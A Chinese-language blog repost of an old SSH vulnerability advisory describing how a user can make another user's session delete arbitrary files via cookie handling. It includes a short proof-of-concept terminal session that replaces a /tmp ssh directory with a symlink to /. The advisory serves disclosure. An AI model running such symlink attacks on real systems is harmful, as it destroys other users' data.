Chinaunix首页 | 论坛 | 博客
  • 博客访问: 845475
  • 博文数量: 756
  • 博客积分: 40000
  • 博客等级: 大将
  • 技术积分: 4980
  • 用 户 组: 普通用户
  • 注册时间: 2008-10-13 14:40
文章分类

全部博文(756)

文章存档

2011年(1)

2008年(755)

我的朋友

分类:

2008-10-13 14:41:54

涉及程序:
SSH
   
描述:
SSH 允许删除其它用户文件漏洞
   
详细:
SSH 是一个提供安全加密通信方式的工具,近日发现它存在漏洞。如果使用了 COOKIES,攻击者便能删除其它用户的任何文件。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


/home/zen/.netscape/cookies
sample exploit:-
[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

--zen-parse

   
解决方案:
不要采用 COOKIES
      
--------------------next---------------------

阅读(341) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~